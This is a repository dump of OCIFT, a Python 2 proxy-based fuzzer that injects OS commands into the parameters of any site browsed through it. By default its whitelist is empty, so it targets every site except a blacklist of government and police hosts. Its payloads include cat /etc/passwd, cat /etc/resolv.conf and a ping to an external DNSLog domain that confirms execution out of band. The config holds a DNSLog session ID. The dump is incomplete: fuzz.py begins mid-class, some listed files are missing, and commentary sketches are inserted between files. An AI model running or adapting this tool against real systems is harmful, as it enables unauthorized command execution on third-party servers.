├── fuzz.conf
├── dnslog.py
├── README.md
├── readme.md
├── make_payload.py
├── fuzz.py
└── run.py

/fuzz.conf:
--------------------------------------------------------------------------------
# Configure each parameter; values are comma-separated

[initconfig]

# Host blacklist - to avoid unnecessary trouble.
black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com

# Static-file extension blacklist - these are not fuzzed
url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg

# Host whitelist - limits the fuzzing scope; empty (default) means everything outside the blacklist is fuzzed.
white_site =

# Parameter-name blacklist - e.g. submit
black_parameters =submit

# Request timeout - limits the timeout of each fuzzing request
timeout =3

# My DnsLog address
my_cloudeye =ano1qu2j.xfkxfk.com

# Keywords used to decide whether an injected command executed successfully
checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP

# Base commands used to test for command injection
base_command =cat /etc/resolv.conf,echo 110586256,ipconfig,ping CommandInj.{my_cloudeye}

# Number of fuzzing threads
fuzz_count =50

# Payload type for fuzzing; the default False means the custom rules are used
commix_payload_type =False

# DnsLog login session ID
dnslog_sessionid =q6wvxls223vykg79vkd4dn2b40zd2d1

# Your Domain
custom_domain =a12s2u2j

# Log file that records successful results
Logfile =rce_success_results.txt

--------------------------------------------------------------------------------
/dnslog.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = Komi

import random
import requests
from string import ascii_lowercase


class DNSLog:
    def __init__(self):
        self.unique = ''
        self.sessionid = ''
        self.random = ''.join([random.choice(ascii_lowercase) for _ in range(10)])
        self.headers = {
            'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36",
            'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
            'Referer': "http://dnslog.xfkxfk.com/dnslog/",
            'Accept-Encoding': "gzip, deflate, sdch",
            'Cookie': "sessionid={my_sessionid}".format(my_sessionid=self.sessionid),
        }

    def getRandomDomain(self, custom='poc'):
        """
        full domain = [random].[custom].[unique].xfkxfk.com
        e.g. fezarvgo.poc.helloworld.xfkxfk.com
        """
        self.custom = custom
        return '%s.%s.%s.xfkxfk.com' % (self.random, self.custom, self.unique)

    def getDnsRecord(self, timeout=3):
        # refresh the Cookie so a sessionid assigned after __init__ is actually sent
        self.headers['Cookie'] = "sessionid=%s" % self.sessionid
        api_base = 'http://dnslog.xfkxfk.com/dnslog/'
        return requests.get(api_base, headers=self.headers, timeout=timeout).content

    def getHttpRecord(self, timeout=3):
        self.headers['Cookie'] = "sessionid=%s" % self.sessionid
        api_base = 'http://dnslog.xfkxfk.com/httplog/'
        return requests.get(api_base, headers=self.headers, timeout=timeout).content

    def verifyDNS(self, domain, timeout=3):
        return domain in self.getDnsRecord(timeout)

    def verifyHTTP(self, domain, timeout=3):
        return domain in self.getHttpRecord(timeout)


if __name__ == "__main__":
    dnslog = DNSLog()
    print dnslog.verifyDNS("xfkxfk")
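A minimal, hypothetical sketch of how the DNSLog helper above can be driven (this snippet is not part of the repository): `myaccount` and the session ID are placeholders for your own dnslog.xfkxfk.com account values, and `verifyDNS` only returns True once the generated domain has actually been resolved by the target.

```python
# Hypothetical usage of the DNSLog class; 'myaccount' and the sessionid value
# are placeholders for your own dnslog.xfkxfk.com account.
from dnslog import DNSLog

dnslog = DNSLog()
dnslog.unique = 'myaccount'                 # the per-account [unique] label
dnslog.sessionid = 'your-dnslog-sessionid'  # same value as dnslog_sessionid in fuzz.conf

domain = dnslog.getRandomDomain()           # e.g. fezarvgo.poc.myaccount.xfkxfk.com
# have the target resolve it, e.g. by injecting "ping " + domain, then poll the record:
print dnslog.verifyDNS(domain)
```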
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# OCIFT
A semi-automated command injection vulnerability fuzzing tool (One Semi-automation command injection vulnerability Fuzz tool)

## 1. What is OCIFT

A semi-automated command injection vulnerability fuzzing tool (One Semi-automation command injection vulnerability Fuzz tool), abbreviated as OCIFT.

## 2. What is OCIFT for

OCIFT is a semi-automated black-box testing tool. It helps penetration testers and code auditors dig deep for command injection vulnerabilities in a target application while they simply browse it as usual.

## 3. What makes OCIFT different

* Payload generation is adapted from the way Commix builds payloads (still needs continuous improvement).
* Semi-automated fuzzing driven through a browser proxy.
* Multi-threaded fuzzing is fast and does not interfere with normal browsing.
* A whitelist can be configured to limit the fuzzing scope.
* A blacklist can be configured to avoid unnecessary trouble.
* DNSLog is supported as an auxiliary verification channel.

## 4. How OCIFT works

A proxy server is implemented on top of Tornado; it parses the GET/POST requests passing through it, extracts the fuzzable points, and replays them with injected payloads.

* File structure

```
|____run.py            main program entry point
|____dnslog.py         DNSLog SDK
|____fuzz.conf         configuration file
|____fuzz.py           fuzzing threads
|____make_payload.py   payload generator
|____readme.md         documentation
```

## 5. Configuration file description

* Configure each parameter; values are comma-separated

`[initconfig]`

* Host blacklist - to avoid unnecessary trouble

`black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com`

* Static-file extension blacklist - these are not fuzzed

`url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg`

* Host whitelist - limits the fuzzing scope; empty (default) means everything outside the blacklist is fuzzed

`white_site =qunar`

* Request timeout - limits the timeout of each fuzzing request

`timeout =10`

* My DnsLog address

`my_cloudeye =ano1qu2j.xfkxfk.com`

* Keywords used to decide whether an injected command executed successfully

`checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP`

* Base commands used to test for command injection; `{my_cloudeye}` is expanded at startup (see the sketch after this section)

`base_command =cat /etc/resolv.conf,echo 110586256,cat /etc/passwd,ipconfig,ping CommandInj.{my_cloudeye},echo 110586256`
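Each `base_command` entry may reference `{my_cloudeye}`; at startup `run.py` splits the comma-separated value and fills the placeholder in with `str.format`. A minimal sketch of that expansion, using the sample values from `fuzz.conf`:

```python
# Minimal sketch (not part of the tool) of how run.py expands base_command:
# the value is split on commas and {my_cloudeye} is formatted into each entry.
my_cloudeye = "ano1qu2j.xfkxfk.com"   # sample value from fuzz.conf
base_command = "cat /etc/resolv.conf,echo 110586256,ipconfig,ping CommandInj.{my_cloudeye}"

base_command_list = []
for cmd in base_command.split(","):
    base_command_list.append(cmd.format(my_cloudeye=my_cloudeye))

print base_command_list
# ['cat /etc/resolv.conf', 'echo 110586256', 'ipconfig',
#  'ping CommandInj.ano1qu2j.xfkxfk.com']
```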
--------------------------------------------------------------------------------
/fuzz.py:
--------------------------------------------------------------------------------
    # Fuzz GET requests
    def Fuzzing_GET(self, request):
        fuzzing_payloads = self.fuzzing_payloads_list
        base_url = request['uri']
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

        for match in re.finditer(r"((\A|[?&])(?P<parameter>[^_]\w*)=)(?P<value>[^&#]+)", base_url):
            in_black_param = self.check_in_keys(match.group("parameter"), self.black_parameters)
            if in_black_param:
                continue

            print "[GET] Fuzzing "+match.group("parameter")
            for payload_item in fuzzing_payloads:
                if self.my_cloudeye in payload_item:
                    payload_item = payload_item.replace(self.my_cloudeye, TAG+"."+self.my_cloudeye)
                    payload_item = match.group("value")+payload_item
                # ip=1.1.1.1;whoami
                fuzzing_uri_append = base_url.replace('%s=%s' % (match.group("parameter"), match.group("value")), '%s=%s' % (match.group("parameter"), match.group("value")+payload_item))
                request['uri'] = fuzzing_uri_append
                isVuln_a = self.HttpHelper(request, TAG)

                # ip=;whoami
                fuzzing_uri_replace = base_url.replace('%s=%s' % (match.group("parameter"), match.group("value")), '%s=%s' % (match.group("parameter"), payload_item))
                request['uri'] = fuzzing_uri_replace
                isVuln_r = self.HttpHelper(request, TAG)

                # if either test succeeds, stop fuzzing this request
                if isVuln_a or isVuln_r:
                    self.FileHelper("GET", base_url, match.group("parameter"), payload_item, TAG)
                    print "[+] Fuzzing Done!!"
                    return
        print "[+] Fuzzing Done!!"
        return

    # Fuzz POST requests
    def Fuzzing_POST(self, request):
        fuzzing_payloads = self.fuzzing_payloads_list
        base_url = request['uri']
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

        post_body = request['body']
        for match in re.finditer(r"((\A|[?&])(?P<parameter>[^_]\w*)=)(?P<value>[^&#]+)", post_body):
            in_black_param = self.check_in_keys(match.group("parameter"), self.black_parameters)
            if in_black_param:
                continue

            try:
                print "[POST] Fuzzing "+match.group("parameter")
                for payload_item in fuzzing_payloads:
                    if self.my_cloudeye in payload_item:
                        payload_item = payload_item.replace(self.my_cloudeye, TAG+"."+self.my_cloudeye)
                        payload_item = match.group("value")+payload_item
                    fuzzing_post_body = post_body.replace('%s=%s' % (match.group("parameter"), match.group("value")), '%s=%s' % (match.group("parameter"), payload_item))
                    request['body'] = fuzzing_post_body
                    isOver = self.HttpHelper(request, TAG)
                    if isOver:
                        self.FileHelper("POST", base_url, match.group("parameter"), payload_item, TAG)
                        print "[success] Fuzzing Done!!"
                        return
                print "[failed] Fuzzing Done!!"
            except:
                pass
        return

    # Fuzzing headers is not supported yet
    def Fuzzing_HEADER(self, request):
        print "Fuzzing HEADER"
        # headers_map = request['headers'].get_all()
        # for (k,v) in headers_map:
        #     print "%s - %s" % (k,v)

    # Write a successful result to the log file
    def FileHelper(self, HTTP_Method, Rce_URL, parameter, payload, TAG):
        wfile = open(self.Logfile, mode='a+')
        found_rce_text = '''\n\
+==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+
+=+TAG: {TAG}
+=+URL: {RCE_URL}
+=+method: {HTTP_Method}
+=+param: {parameter}
+=+payload: {payload}
+==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+\n
'''
        found_rce_text = found_rce_text.replace("{TAG}", TAG).replace("{RCE_URL}", Rce_URL).replace("{HTTP_Method}", HTTP_Method).replace("{parameter}", parameter).replace("{payload}", payload)

        print found_rce_text

        wfile.write(found_rce_text)
        wfile.write("\r\n")
        wfile.flush()
        wfile.close()

    def check_in_keys(self, uri, keys_list):
        uri = uri.lower()

        if len(keys_list) == 0:
            return False
        else:
            for k in keys_list:
                if k.lower() in uri:
                    return True
            return False

    def check_url_blackext(self, uri):
        not_staticFlag = True
        url_ext = urlparse(uri).path[-5:].lower()

        if ".js" in uri and ".jsp" not in url_ext:
            not_staticFlag = False
        else:
            for u in self.url_ext_blacklist:
                if u in url_ext:
                    not_staticFlag = False

        return not_staticFlag

    def run(self):
        while True:
            try:
                request = self.queue.get()
                uri = request['uri']
                hash_value = self.HASH_Calc(requests_dict=request)
                in_white_site = self.check_in_keys(uri, self.white_site)
                in_black_site = self.check_in_keys(uri, self.black_site)

                is_notstatic = self.check_url_blackext(uri)

                # skip requests that were already fuzzed, are outside the whitelist,
                # are on the blacklist, or point to static files
                if hash_value not in self.fuzzing_finished_hash and in_white_site and not in_black_site and is_notstatic:
                    self.fuzzing_finished_hash.append(hash_value)
                    method = request['method']
                    if "POST" in method:
                        self.Fuzzing_POST(request)
                    elif "GET" in method:
                        self.Fuzzing_GET(request)
            except:
                pass
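`Fuzzing_GET` mutates each query parameter in two ways: appending the payload to the original value and replacing the value outright (the `ip=1.1.1.1;whoami` / `ip=;whoami` comments above). A minimal sketch of the two URL mutations, using a made-up target URL and payload:

```python
# Minimal sketch of the two GET mutation modes used above; the target URL and
# payload are illustrative placeholders, not output of the tool.
base_url = "http://target.example/ping?ip=1.1.1.1&count=2"
parameter, value, payload = "ip", "1.1.1.1", ";whoami"

# append mode: keep the original value and add the payload after it
fuzzing_uri_append = base_url.replace('%s=%s' % (parameter, value),
                                      '%s=%s' % (parameter, value + payload))

# replace mode: substitute the payload for the original value
fuzzing_uri_replace = base_url.replace('%s=%s' % (parameter, value),
                                       '%s=%s' % (parameter, payload))

print fuzzing_uri_append    # http://target.example/ping?ip=1.1.1.1;whoami&count=2
print fuzzing_uri_replace   # http://target.example/ping?ip=;whoami&count=2
```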
--------------------------------------------------------------------------------
/run.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 17/4/8 00:00 AM
# @Author  : Komi
# @File    : run.py
# @Ver:    : 0.1

helpinfo = '''\
##########################################################
#     _____   ______  ___  _____  __  __                 #
#    / ___ \ / ____/ |   | |_ _ |  |_____|               #
#   / /   \ \ / /    |   | | |_  | |                     #
#  |  \___ / /       | \ ____ | | | _| | |               #
#   \ __ __/ \ ____ / |___| |_| |___|  v1.0              #
##########################################################
# A semi-automated command injection vulnerability fuzzing tool
Named From: OCIFT(OS Command Injection Fuzzy Tool)
Referer:
    https://github.com/commixproject/commix
    https://www.owasp.org/index.php/Command_Injection
Instructions:
    1. python run.py 8081 (listen on port 8081 as the proxy port)
    2. Configure the browser to browse through the proxy address http://127.0.0.1:8081
    3. Test results are recorded in the log file, by default rce_success_results.txt
'''
print helpinfo

import logging
import socket
import string
import random
from urlparse import urlparse
import os, sys
from Queue import Queue
import threading
import tornado.httpserver
import tornado.ioloop
import tornado.iostream
import tornado.web
from tornado.web import RequestHandler
import tornado.httpclient
from fuzz import CIF_Fuzz
from make_payload import PayloadGenerate
import ConfigParser

# logging.basicConfig(level=logging.ERROR)

class ProxyManage:
    def run_proxy(self, address, port, handler):
        '''
        Start proxy server
        '''
        app = tornado.web.Application([
            (r'.*', handler),
        ])
        app.listen(port, address)
        logging.info("Starting HTTP proxy on {0}".format(address + ':' + str(port)))
        ioloop = tornado.ioloop.IOLoop.instance()
        ioloop.start()

    def close_proxy(self):
        ioloop = tornado.ioloop.IOLoop.instance()
        logging.info('stop proxy server')
        ioloop.stop()

def get_proxy(url):
    url_parsed = urlparse(url, scheme='http')
    proxy_key = '%s_proxy' % url_parsed.scheme
    return os.environ.get(proxy_key)

def parse_proxy(proxy):
    proxy_parsed = urlparse(proxy, scheme='http')
    return proxy_parsed.hostname, proxy_parsed.port

def fetch_request(url, callback, **kwargs):
    proxy = get_proxy(url)
    if proxy:
        tornado.httpclient.AsyncHTTPClient.configure(
            'tornado.curl_httpclient.CurlAsyncHTTPClient')
        host, port = parse_proxy(proxy)
        kwargs['proxy_host'] = host
        kwargs['proxy_port'] = port

    req = tornado.httpclient.HTTPRequest(url, **kwargs)
    client = tornado.httpclient.AsyncHTTPClient()
    client.fetch(req, callback, raise_error="error")

class LoadConfig:
    def __init__(self):
        self.version = "V1.0"

    def read_config(self):
        self.conf = ConfigParser.SafeConfigParser()
        self.conf.read('fuzz.conf')
        self.initconfig = self.conf.items('initconfig')

    def get_configprperity(self, key=""):
        # ConfigParser lowercases option names, so compare case-insensitively
        # (otherwise the 'Logfile' lookup below would return None)
        for tmp in self.initconfig:
            if key.lower() == tmp[0] and key != "":
                return tmp[1]

class ProxyHandler(RequestHandler):
    SUPPORTED_METHODS = ['GET', 'POST', 'CONNECT', "OPTIONS"]
    queue = Queue()
    print "[+] Load configuration file..."

    # configuration and fuzzing threads are initialized once, when the class body executes
    londconf = LoadConfig()
    londconf.read_config()
    londconf.get_configprperity()

    my_cloudeye = londconf.get_configprperity('my_cloudeye')
    white_site = londconf.get_configprperity('white_site')
    black_site = londconf.get_configprperity('black_hosts')
    checkkeys = londconf.get_configprperity('checkkeys')
    checkkey_list = checkkeys.split(",")
    fuzz_count = londconf.get_configprperity('fuzz_count')
    custom_domain = londconf.get_configprperity('custom_domain')
    dnslog_sessionid = londconf.get_configprperity('dnslog_sessionid')
    commix_payload_type = londconf.get_configprperity('commix_payload_type')
    url_ext_black = londconf.get_configprperity('url_ext_black')
    black_parameters = londconf.get_configprperity('black_parameters')

    Logfile = londconf.get_configprperity('Logfile')

    base_command = londconf.get_configprperity("base_command")

    base_command_list = []
    for cmd in base_command.split(","):
        base_command_list.append(cmd.format(my_cloudeye=my_cloudeye))

    timeout = londconf.get_configprperity("timeout")
    print "[+] Initialize Payloads..."
    PayloadME = PayloadGenerate(base_command_list)
    if commix_payload_type == "False":
        PayloadME.fuzz_mypayloads()
    else:
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
        PayloadME.make_commix_payloads(TAG=TAG)
        checkkey_list.append(TAG)

    fuzzing_payloads_list = list(set(PayloadME.fuzzing_payloads_list))
    print "[+] we have %s payloads " % len(fuzzing_payloads_list)

    print "[+] Start Fuzzing Threads..."
    for i in range(0, int(fuzz_count)):
        cifz = CIF_Fuzz(queue=queue)
        cifz.fuzzing_payloads_list = PayloadME.fuzzing_payloads_list
        cifz.CheckKey_list = checkkey_list
        cifz.my_cloudeye = my_cloudeye
        cifz.url_ext_blacklist = url_ext_black.split(",")
        cifz.dnslog_sessionid = dnslog_sessionid
        cifz.Logfile = Logfile
        cifz.custom_domain = custom_domain
        cifz.white_site = white_site.split(",")
        cifz.black_site = black_site.split(",")
        cifz.black_parameters = black_parameters.split(",")
        cifz.timeout = int(timeout)
        cifz.start()
    print "[+] Everything is ready."

    @tornado.web.asynchronous
    def get(self):
        def handle_response(response):
            if (response.error and not
                    isinstance(response.error, tornado.httpclient.HTTPError)):
                self.set_status(500)
                self.write('Internal server error:\n' + str(response.error))
            else:
                self.set_status(response.code, response.reason)
                self._headers = tornado.httputil.HTTPHeaders()  # clear tornado default header

                for header, v in response.headers.get_all():
                    if header not in ('Content-Length', 'Transfer-Encoding', 'Content-Encoding', 'Connection'):
                        self.add_header(header, v)  # some headers appear multiple times, e.g. 'Set-Cookie'

                if response.body:
                    self.set_header('Content-Length', len(response.body))
                    self.write(response.body)
            self.finish()

        body = self.request.body
        if not body:
            body = None

        try:
            if 'Proxy-Connection' in self.request.headers:
                del self.request.headers['Proxy-Connection']

            fetch_request(
                self.request.uri, handle_response,
                method=self.request.method, body=body,
                headers=self.request.headers, follow_redirects=False,
                allow_nonstandard_methods=True)

            request_dict = {}
            request_dict['uri'] = self.request.uri
            request_dict['method'] = self.request.method
            request_dict['headers'] = self.request.headers
            request_dict['body'] = body
            self.queue.put(request_dict)

        except tornado.httpclient.HTTPError as e:
            if hasattr(e, 'response') and e.response:
                handle_response(e.response)
            else:
                self.set_status(500)
                self.write('Internal server error:\n' + str(e))
                self.finish()

    @tornado.web.asynchronous
    def post(self):
        return self.get()

    @tornado.web.asynchronous
    def options(self):
        return self.get()

    @tornado.web.asynchronous
    def connect(self):
        host, port = self.request.uri.split(':')
        client = self.request.connection.stream

        def read_from_client(data):
            upstream.write(data)

        def read_from_upstream(data):
            client.write(data)

        def client_close(data=None):
            if upstream.closed():
                return
            if data:
                upstream.write(data)
            upstream.close()

        def upstream_close(data=None):
            if client.closed():
                return
            if data:
                client.write(data)
            client.close()

        def start_tunnel():
            client.read_until_close(client_close, read_from_client)
            upstream.read_until_close(upstream_close, read_from_upstream)
            client.write(b'HTTP/1.0 200 Connection established\r\n\r\n')

        def on_proxy_response(data=None):
            if data:
                first_line = data.splitlines()[0]
                http_v, status, text = first_line.split(None, 2)
                if int(status) == 200:
                    start_tunnel()
                    return

            self.set_status(500)
            self.finish()

        def start_proxy_tunnel():
            upstream.write('CONNECT %s HTTP/1.1\r\n' % self.request.uri)
            upstream.write('Host: %s\r\n' % self.request.uri)
            upstream.write('Proxy-Connection: Keep-Alive\r\n\r\n')
            upstream.read_until('\r\n\r\n', on_proxy_response)

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        upstream = tornado.iostream.IOStream(s)

        proxy = get_proxy(self.request.uri)
        if proxy:
            proxy_host, proxy_port = parse_proxy(proxy)
            upstream.connect((proxy_host, proxy_port), start_proxy_tunnel)
        else:
            upstream.connect((host, int(port)), start_tunnel)


class RunProxyThread(threading.Thread):
    def __init__(self, handler, host, port):
        self.host = host
        self.port = port
        self.handler = handler
        threading.Thread.__init__(self)

    def run(self):
        ProxyManage().run_proxy(self.host, self.port, self.handler)

if __name__ == "__main__":
    port = 8888
    if len(sys.argv) > 1:
        port = int(sys.argv[1])
    print "[*] Starting HTTP proxy at: http://127.0.0.1:%d" % port

    os.system('pkill -f "python run.py"')

    RunProxyThread(ProxyHandler, '127.0.0.1', int(port)).run()

--------------------------------------------------------------------------------
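Once `run.py` is listening (for example `python run.py 8081`), any HTTP client pointed at the proxy feeds its requests into the fuzzing queue. A minimal, hypothetical smoke test using `requests`; the proxy address comes from the instructions above, while the target URL is a placeholder, not a real endpoint:

```python
# Hypothetical smoke test: send one request through the local OCIFT proxy so
# its GET parameters get queued for fuzzing. http://testphp.example/ping.php
# is a made-up target.
import requests

proxies = {
    'http': 'http://127.0.0.1:8081',   # the port passed to run.py
}
r = requests.get('http://testphp.example/ping.php',
                 params={'ip': '1.1.1.1'},
                 proxies=proxies, timeout=10)
print r.status_code
# Successful injections are appended to rce_success_results.txt (the Logfile option).
```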